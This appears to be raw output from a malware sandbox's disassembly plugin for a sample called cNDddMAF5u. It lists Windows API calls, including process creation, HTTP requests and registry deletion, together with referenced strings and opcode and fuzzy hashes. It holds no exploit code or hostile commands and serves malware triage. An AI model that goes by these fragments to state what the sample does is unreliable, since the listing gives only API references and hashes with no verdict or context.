                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00705A40
                                                        • SetWindowTextW.USER32(?,?), ref: 00705A57
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00705A6C
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00705A72
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00705A82
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00705A88
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00705AA9
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00705AC3
                                                        • GetWindowRect.USER32(?,?), ref: 00705ACC
                                                        • _wcslen.LIBCMT ref: 00705B33
                                                        • SetWindowTextW.USER32(?,?), ref: 00705B6F
                                                        • GetDesktopWindow.USER32 ref: 00705B75
                                                        • GetWindowRect.USER32(00000000), ref: 00705B7C
                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00705BD3
                                                        • GetClientRect.USER32(?,?), ref: 00705BE0
                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00705C05
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00705C2F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                        • String ID:
                                                        • API String ID: 895679908-0
                                                        • Opcode ID: df828fa8ca5c9b4e111704212d0a16451a8e7fc70675f2063b2a30fdb3801170
                                                        • Instruction ID: a7f0ba0414fb6a3f4688a86c95b30b8bd3e4a9ad2168c8c53ef6906392fdf5c2
                                                        • Opcode Fuzzy Hash: df828fa8ca5c9b4e111704212d0a16451a8e7fc70675f2063b2a30fdb3801170
                                                        • Instruction Fuzzy Hash: 0A715B71A00B09EFDB21DFA8CE85AAFBBF5FB48705F104618E542A25A0D779B940CF54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[v
                                                        • API String ID: 176396367-1498973047
                                                        • Opcode ID: fb489e9b30dd849892a0c80b4373a2a85e11cc6008e24a4b33c8e2e44711596e
                                                        • Instruction ID: e35c36b1c591e27cd6ea6f392cc483afc7db6fff1509190a343fc575a3dd775c
                                                        • Opcode Fuzzy Hash: fb489e9b30dd849892a0c80b4373a2a85e11cc6008e24a4b33c8e2e44711596e
                                                        • Instruction Fuzzy Hash: 9EE1D431A00516DACB149F74C851AFDFBF9BF44710F54832AE456A7290DB38AE859B90
                                                        APIs
                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006C00C6
                                                          • Part of subcall function 006C00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0077070C,00000FA0,11DDEE30,?,?,?,?,006E23B3,000000FF), ref: 006C011C
                                                          • Part of subcall function 006C00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006E23B3,000000FF), ref: 006C0127
                                                          • Part of subcall function 006C00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006E23B3,000000FF), ref: 006C0138
                                                          • Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006C014E
                                                          • Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006C015C
                                                          • Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006C016A
                                                          • Part of subcall function 006C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006C0195
                                                          • Part of subcall function 006C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006C01A0
                                                        • ___scrt_fastfail.LIBCMT ref: 006C00E7
                                                          • Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9
                                                        Strings
                                                        • SleepConditionVariableCS, xrefs: 006C0154
                                                        • InitializeConditionVariable, xrefs: 006C0148
                                                        • WakeAllConditionVariable, xrefs: 006C0162
                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006C0122
                                                        • kernel32.dll, xrefs: 006C0133
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                        • API String ID: 66158676-1714406822
                                                        • Opcode ID: de8e0d18c4adf8cbd96e308e1dc757f7fc8c2869b34189eb5ea3da1bce9af615
                                                        • Instruction ID: a5888ccc8a98820219cced45beddc8f1cd22cae52f6d8abac09b494e955979fb
                                                        • Opcode Fuzzy Hash: de8e0d18c4adf8cbd96e308e1dc757f7fc8c2869b34189eb5ea3da1bce9af615
                                                        • Instruction Fuzzy Hash: DB21DAB2B44710EBFB115BB4AC09F797395DB04B91F15412DF805A2691DB789C008BD8
                                                        APIs
                                                        • CharLowerBuffW.USER32(00000000,00000000,0073CC08), ref: 00714527
                                                        • _wcslen.LIBCMT ref: 0071453B
                                                        • _wcslen.LIBCMT ref: 00714599
                                                        • _wcslen.LIBCMT ref: 007145F4
                                                        • _wcslen.LIBCMT ref: 0071463F
                                                        • _wcslen.LIBCMT ref: 007146A7
                                                          • Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD
                                                        • GetDriveTypeW.KERNEL32(?,00766BF0,00000061), ref: 00714743
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2055661098-1000479233
                                                        • Opcode ID: c659b4fdae1529582c7ee697ca3e4a77a64112879e951746d9c4c3c6dbbc1cc7
                                                        • Instruction ID: 7c8642b8ad8156410f609ff5ccaa7c26a51d639d55cb7a21dadd2c1e889e42dc
                                                        • Opcode Fuzzy Hash: c659b4fdae1529582c7ee697ca3e4a77a64112879e951746d9c4c3c6dbbc1cc7
                                                        • Instruction Fuzzy Hash: CDB1C1716083029FC710EF28C890AAAB7E6BF96764F50491DF496C72D1D738DD84CBA2
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00739147
                                                          • Part of subcall function 00737674: ClientToScreen.USER32(?,?), ref: 0073769A
                                                          • Part of subcall function 00737674: GetWindowRect.USER32(?,?), ref: 00737710
                                                          • Part of subcall function 00737674: PtInRect.USER32(?,?,00738B89), ref: 00737720
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007391B0
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007391BB
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007391DE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00739225
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0073923E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00739255
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00739277
                                                        • DragFinish.SHELL32(?), ref: 0073927E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00739371
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#w
                                                        • API String ID: 221274066-3190343874
                                                        • Opcode ID: d3fb1cb54dd5c8ba8a8a23174f3f3a693c6d64c13b5219e8671ad1351c09b764
                                                        • Instruction ID: 6a146d744b4a02d668d0a890b8ddb502a44986eb5701f0b23f5b94bb90e1f754
                                                        • Opcode Fuzzy Hash: d3fb1cb54dd5c8ba8a8a23174f3f3a693c6d64c13b5219e8671ad1351c09b764
                                                        • Instruction Fuzzy Hash: 7E618C71108300AFD701EF64CC85DAFBBE9EF89350F10492EF696921A1DB749A49CB66
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0072B198
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0072B1B0
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0072B1D4
                                                        • _wcslen.LIBCMT ref: 0072B200
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0072B214
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0072B236
                                                        • _wcslen.LIBCMT ref: 0072B332
                                                          • Part of subcall function 007105A7: GetStdHandle.KERNEL32(000000F6), ref: 007105C6
                                                        • _wcslen.LIBCMT ref: 0072B34B
                                                        • _wcslen.LIBCMT ref: 0072B366
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0072B3B6
                                                        • GetLastError.KERNEL32(00000000), ref: 0072B407
                                                        • CloseHandle.KERNEL32(?), ref: 0072B439
                                                        • CloseHandle.KERNEL32(00000000), ref: 0072B44A
                                                        • CloseHandle.KERNEL32(00000000), ref: 0072B45C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0072B46E
                                                        • CloseHandle.KERNEL32(?), ref: 0072B4E3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 2178637699-0
                                                        • Opcode ID: 9a15a7b23b4b816eb1050ce2c07a027628524cb99301ebce47f946601c2dadc4
                                                        • Instruction ID: 3be2db056e89eed85462b5b07c4df285fcc9a39665d66e3994962329bdf7d7ad
                                                        • Opcode Fuzzy Hash: 9a15a7b23b4b816eb1050ce2c07a027628524cb99301ebce47f946601c2dadc4
                                                        • Instruction Fuzzy Hash: E5F1AB31604350DFC765EF24D891B6EBBE2AF85310F18855DF8999B2A2CB35EC40CB96
                                                        APIs
                                                        • GetMenuItemCount.USER32(00771990), ref: 006E2F8D
                                                        • GetMenuItemCount.USER32(00771990), ref: 006E303D
                                                        • GetCursorPos.USER32(?), ref: 006E3081
                                                        • SetForegroundWindow.USER32(00000000), ref: 006E308A
                                                        • TrackPopupMenuEx.USER32(00771990,00000000,?,00000000,00000000,00000000), ref: 006E309D
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006E30A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                        • String ID: 0
                                                        • API String ID: 36266755-4108050209
                                                        • Opcode ID: 4954cdd648fdd5a89199e29770ac3fe7c1823204f54856994302163231f550f0
                                                        • Instruction ID: a35917a974580c276d3a451e2feb7ee5a3aa48f9d08ff189e56d33124a17e438
                                                        • Opcode Fuzzy Hash: 4954cdd648fdd5a89199e29770ac3fe7c1823204f54856994302163231f550f0
                                                        • Instruction Fuzzy Hash: 58710531641366BAFB219F25CC59FEABF6AFF01364F204206F5146A2E1C7B5AE50CB50
                                                        APIs
                                                        • DestroyWindow.USER32(?,?), ref: 00736DEB
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00736E5F
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00736E81
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00736E94
                                                        • DestroyWindow.USER32(?), ref: 00736EB5
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006A0000,00000000), ref: 00736EE4
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00736EFD
                                                        • GetDesktopWindow.USER32 ref: 00736F16
                                                        • GetWindowRect.USER32(00000000), ref: 00736F1D
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00736F35
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00736F4D
                                                          • Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 2429346358-3619404913
                                                        • Opcode ID: 3d393c0c3979a1ab3f32dcaa74c82878fad0bb1cbbe772b77faebff255571e6a
                                                        • Instruction ID: cbf19c50416f8eacd9768b6c7b1d15fbbcbb566ad5a2f01af6a3405c7af597fa
                                                        • Opcode Fuzzy Hash: 3d393c0c3979a1ab3f32dcaa74c82878fad0bb1cbbe772b77faebff255571e6a
                                                        • Instruction Fuzzy Hash: 06718CB0104241AFEB21CF18DC44F6ABBE9FB89304F44841DFA8997261C778E946CF25
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0071C4B0
                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0071C4C3
                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0071C4D7
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0071C4F0
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0071C533
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0071C549
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0071C554
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0071C584
                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0071C5DC
                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0071C5F0
                                                        • InternetCloseHandle.WININET(00000000), ref: 0071C5FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                        • String ID:
                                                        • API String ID: 3800310941-3916222277
                                                        • Opcode ID: 0b6aa25af4193ebeeb0f21235115f38f675d890097c8f47fb0bdbe1b5680cfbf
                                                        • Instruction ID: a8c81926f7a46b35477e59bd5b25106e6e9514c512285e04fe0f483b4c416cdb
                                                        • Opcode Fuzzy Hash: 0b6aa25af4193ebeeb0f21235115f38f675d890097c8f47fb0bdbe1b5680cfbf
                                                        • Instruction Fuzzy Hash: EF5150B1540204BFEB228FA8C948ABB7BFDFF08755F108419F945D6290D738E994DB61
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00738592
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385A2
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385AD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385BA
                                                        • GlobalLock.KERNEL32(00000000), ref: 007385C8
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385D7
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007385E0
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385E7
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385F8
                                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0073FC38,?), ref: 00738611
                                                        • GlobalFree.KERNEL32(00000000), ref: 00738621
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00738641
                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00738671
                                                        • DeleteObject.GDI32(?), ref: 00738699
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007386AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 4e89b7d81ed9a8cbf3bd941fc0cda1d7aec282c5a6f435173de335317d07bedb
                                                        • Instruction ID: d16cf362492bb70a7ba612d8194945870ac004bf9c61d0dd4e9d71c026ba0872
                                                        • Opcode Fuzzy Hash: 4e89b7d81ed9a8cbf3bd941fc0cda1d7aec282c5a6f435173de335317d07bedb
                                                        • Instruction Fuzzy Hash: 91410D75600208EFEB119F65DC49EAB7BB8FF89711F108058F905E7251DB389D01DB65
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 00711502
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0071150B
                                                        • VariantClear.OLEAUT32(?), ref: 00711517
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007115FB
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00711657
                                                        • VariantInit.OLEAUT32(?), ref: 00711708
                                                        • SysFreeString.OLEAUT32(?), ref: 0071178C
                                                        • VariantClear.OLEAUT32(?), ref: 007117D8
                                                        • VariantClear.OLEAUT32(?), ref: 007117E7
                                                        • VariantInit.OLEAUT32(00000000), ref: 00711823
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 1234038744-3931177956
                                                        • Opcode ID: d323cec45af22513e67875141fe1c5d2f1912fe82f96cf526c7e03042e6ffabf
                                                        • Instruction ID: 48bf4f79321529e19f64ee4ed2a3ea28910128334877b782ec46e91cfe466b23
                                                        • Opcode Fuzzy Hash: d323cec45af22513e67875141fe1c5d2f1912fe82f96cf526c7e03042e6ffabf
                                                        • Instruction Fuzzy Hash: D3D10271A00115DBDB10AF68D885BFDB7B6BF45700F90815AE646AF2C0DB38ED90DB62
                                                        APIs
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                          • Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072B6F4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072B772
                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 0072B80A
                                                        • RegCloseKey.ADVAPI32(?), ref: 0072B87E
                                                        • RegCloseKey.ADVAPI32(?), ref: 0072B89C
                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0072B8F2
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0072B904
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0072B922
                                                        • FreeLibrary.KERNEL32(00000000), ref: 0072B983
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0072B994
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 146587525-4033151799
                                                        • Opcode ID: 45bdbf43f32d3eea3d44f12cd31aa0f7959859ef907d3153a460da307cef9297
